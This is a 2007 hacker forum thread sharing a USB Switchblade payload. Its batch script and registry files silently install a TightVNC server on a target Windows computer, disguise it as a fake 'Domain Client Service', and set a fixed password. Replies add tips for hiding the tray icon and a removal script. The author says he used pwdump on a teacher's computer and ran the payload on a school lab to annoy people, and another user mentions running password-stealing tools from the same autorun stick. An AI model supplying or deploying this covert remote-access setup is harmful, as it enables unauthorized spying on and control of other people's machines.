kz26 Posted January 13, 2007 Share Posted January 13, 2007 I found that the VNC entry on the Switchblade wiki was too cumbersome to follow. I did some research and was able to create a silent install package for the TightVNC server (seewww.tightvnc.com.) The beauty of this VNC variant is that the server requires only 2 files, an EXE and its DLL. To create this payload: 1. Go to the TightVNC homepage above. 2. Download the no-install zip package. 3. In your switchbladetools directory, create the folder "tvnc". 4. Copy "winvnc.exe" and "VNCHooks.dll" to the "tvnc" directory. 5. Create "vnc.cmd" in your tools directory with the following code: @echo off REM Silent Install of TightVNC server REM Install script by kz26 REM Part 1 - Copy server files xcopy tvncwinvnc.exe %systemroot% /c /y xcopy tvncVNCHooks.dll %systemroot% /c /y REM install phony WinVNC service and import reg settings sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." regedit.exe /s tvncreg1.reg regedit.exe /s tvncreg2.reg REM Start the VNC Service and have fun net start winvnc 6. Create reg1.reg and reg2.reg in your "tvnc" directory. Contents of reg1.reg Windows Registry Editor Version 5.00 [HKEY_CURRENT_USERSoftwareORL] [HKEY_CURRENT_USERSoftwareORLVNCHooks] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe] "use_GetUpdateRect"=dword:00000001 "use_Timer"=dword:00000000 "use_KeyPress"=dword:00000001 "use_LButtonUp"=dword:00000001 "use_MButtonUp"=dword:00000001 "use_RButtonUp"=dword:00000001 "use_Deferral"=dword:00000001 Contents of reg2.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:00000002 "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000000 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000001 "AuthRequired"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000000 "PortNumber"=dword:00001f90 "HTTPPortNumber"=dword:000016a8 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:77,96,ba,8c,c2,b3,68,07 "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 7. Add the following to your go.cmd file: start /b .vnc.cmd ------------ This payload will silently install the WinVNC service and disguise it as a "realistic" system service. To connect: Use any VNC viewer to connect to the target. Port: 8080 Username: N/A password: hacked I believe this payload is much more streamlined. Obviously, it won't do the external IP email send as the wiki version advertises, but this method should be more than adequate for most people. P.S. I use this to install VNC at my school's WinXP Pro computer lab. Works great for pissing off unsuspecting people... [/code] Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted January 13, 2007 Share Posted January 13, 2007 Kudos on the nice switchblade module! Quote Link to comment Share on other sites More sharing options...
Guest Twilight Zone Posted January 13, 2007 Share Posted January 13, 2007 Good.Can you include cleaning module , when you dont need it anymore ? Quote Link to comment Share on other sites More sharing options...
DLSS Posted January 13, 2007 Share Posted January 13, 2007 u sayd u used it @ school however dont u then have a limited account and no acces to regedit ? thts how it is @ our school anyway ... Quote Link to comment Share on other sites More sharing options...
kz26 Posted January 13, 2007 Author Share Posted January 13, 2007 Yeah, the students at our school are supposed to have limited accounts. However, i pwdumped a teachers comp when they weren't there to get the local admin password. Quote Link to comment Share on other sites More sharing options...
kz26 Posted January 13, 2007 Author Share Posted January 13, 2007 Ok, this antidote is pretty simple - it does everything BUT delete the registry keys, but that shouldn't be a major issue. @echo off REM TightVNC Server Antidote REM Turn off the service sc stop winvnc REM Delete the service sc delete winvnc REM Delete the server files del %systemroot%winvnc.exe del %systemroot%VNCHooks.dll Quote Link to comment Share on other sites More sharing options...
jinster364 Posted October 1, 2007 Share Posted October 1, 2007 where do i type in the password and port, whenever i try to connect to the host computer, it says can not connect Quote Link to comment Share on other sites More sharing options...
Joerg Posted October 1, 2007 Share Posted October 1, 2007 I recommend you to try the reverse vnc. Otherwise you have to hack every router to get vnc ;) Quote Link to comment Share on other sites More sharing options...
joker5893 Posted October 5, 2007 Share Posted October 5, 2007 Hi, im getting an error when i run my go.cmd file it says that the winvnc.exe and vnchooks.dll file can not be found even though they are in the same folder as the go.cmd file. Quote Link to comment Share on other sites More sharing options...
Deveant Posted October 6, 2007 Share Posted October 6, 2007 Hi, im getting an error when i run my go.cmd file it says that the winvnc.exe and vnchooks.dll file can not be found even though they are in the same folder as the go.cmd file. need to put the winvnc.exe and vnchooks.dll files in a folder called "tvnc" Quote Link to comment Share on other sites More sharing options...
USBHacker Posted October 6, 2007 Share Posted October 6, 2007 u sayd u used it @ school however dont u then have a limited account and no acces to regedit ? thts how it is @ our school anyway ... Also, sometimes it is possible to get around that by using a 3rd party regedit. I use RegAlyser. It's a fun & easy way to re-enable the run button in the start menu, cmd and some other things! :D USBHacker PS: Can someone please put all the required files for this hack, into a zip (or some other archive format) and host it onto some server (mediafire is a good one), and give me the link? Or save it as an attachment on this forum? Thanks in advance, USBHacker Quote Link to comment Share on other sites More sharing options...
HALEN666 Posted October 10, 2007 Share Posted October 10, 2007 even better, if you wanna hide the icon in the tray bar just add this reg to the first reg file HKLMSOFTWAREORLWinVNC3DisableTrayIcon DWORD "1" Quote Link to comment Share on other sites More sharing options...
DLSS Posted October 11, 2007 Share Posted October 11, 2007 u sayd u used it @ school however dont u then have a limited account and no acces to regedit ? thts how it is @ our school anyway ... Also, sometimes it is possible to get around that by using a 3rd party regedit. I use RegAlyser. It's a fun & easy way to re-enable the run button in the start menu, cmd and some other things! :D USBHacker PS: Can someone please put all the required files for this hack, into a zip (or some other archive format) and host it onto some server (mediafire is a good one), and give me the link? Or save it as an attachment on this forum? Thanks in advance, USBHacker is regalyzer portable? , or do you have a portable version ? Quote Link to comment Share on other sites More sharing options...
USBHacker Posted October 15, 2007 Share Posted October 15, 2007 ^http://www.mediafire.com/?fy0b3m1vdzz ;) PS: Since I did this for you, can you please upload all these stuff for me? If not, that is also ok. Quote Link to comment Share on other sites More sharing options...
AndyzBong Posted October 25, 2007 Share Posted October 25, 2007 Howdy all, I always enjoy a new silent VNC server install via the USB switchblade, but I can never get them to work. I downloaded VNCHooks.dll and winvnc.exe (TightVNC Win32 Server) from http://www.tightvnc.com/download (tightvnc-1.3.9_x86.zip) and placed both of these files in my WIPCMDtvnc folder. (WIPCMD is my "payload folder" containing go.cmd and vnc.cmd) My vnc.cmd code looks like this: @echo off REM Silent Install of TightVNC server REM Script by kz26 REM Copy VNC Server Files xcopy tvncwinvnc.exe %systemroot% /c /y xcopy tvncVNCHooks.dll %systemroot% /c /y REM Install fake WinVNC service and import reg settings sc create winvnc binpath= "%systemroot%winvnc.exe -service" type= interact type= own start= auto displayname= "Domain Client Service" sc description winvnc "Manages communication between a Windows Server Domain Controller and a connected Domain Client. If this service is not started or disabled, domain functions will be inoperable." regedit.exe /s tvncreg1.reg regedit.exe /s tvncreg2.reg REM Port: 8080 REM Username: N/A REM Password: hacked net start winvnc :End exit This are my reg1.reg and reg2.reg code(s): reg1.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] [HKEY_CURRENT_USERSoftwareORL] [HKEY_CURRENT_USERSoftwareORLVNCHooks] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefs] [HKEY_CURRENT_USERSoftwareORLVNCHooksApplication_Prefswinvnc.exe] "use_GetUpdateRect"=dword:00000001 "use_Timer"=dword:00000000 "use_KeyPress"=dword:00000001 "use_LButtonUp"=dword:00000001 "use_MButtonUp"=dword:00000001 "use_RButtonUp"=dword:00000001 "use_Deferral"=dword:00000001 reg2.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREORL] [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3] "ConnectPriority"=dword:00000000 "DebugMode"=dword:00000000 "DebugLevel"=dword:00000002 "LoopbackOnly"=dword:00000000 "EnableHTTPDaemon"=dword:00000000 "EnableURLParams"=dword:00000000 "AllowLoopback"=dword:00000001 "AuthRequired"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default] "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000001e "QueryAccept"=dword:00000000 "QueryAllowNoPass"=dword:00000000 "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000000 "PortNumber"=dword:00001f90 "HTTPPortNumber"=dword:000016a8 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "IdleTimeout"=dword:00000000 "LockSetting"=dword:00000000 "RemoveWallpaper"=dword:00000001 "Password"=hex:77,96,ba,8c,c2,b3,68,07 "PasswordViewOnly"=hex:77,96,ba,8c,c2,b3,68,07 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 and finally, this is my go.cmd code that launches vnc.cmd: @echo [START Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 start /b .vnc.cmd @echo [End Silent WinVNC Server Install] >> Documentslogfiles%computername%.log 2>&1 :End exit This code is the last script to be autorun by my USB Switchblade; when it executes, the rest of my applications (FirePassword, netpass, iehv, etc) all work fine. Note: I added [HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3DisableTrayIcon DWORD "1"] to the reg1.reg file due to HALEN666's comment about this registry key disabling the WinVNC server icon from the system tray; but can't the same means be achieved by ResHacking winvnc.exe and replacing the WinVNC icon with a clear icon? - AndyzBong Quote Link to comment Share on other sites More sharing options...
Joerg Posted October 25, 2007 Share Posted October 25, 2007 Then you have a blank icon in the systray, more suspicious than an "invisible" icon (no icon). Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.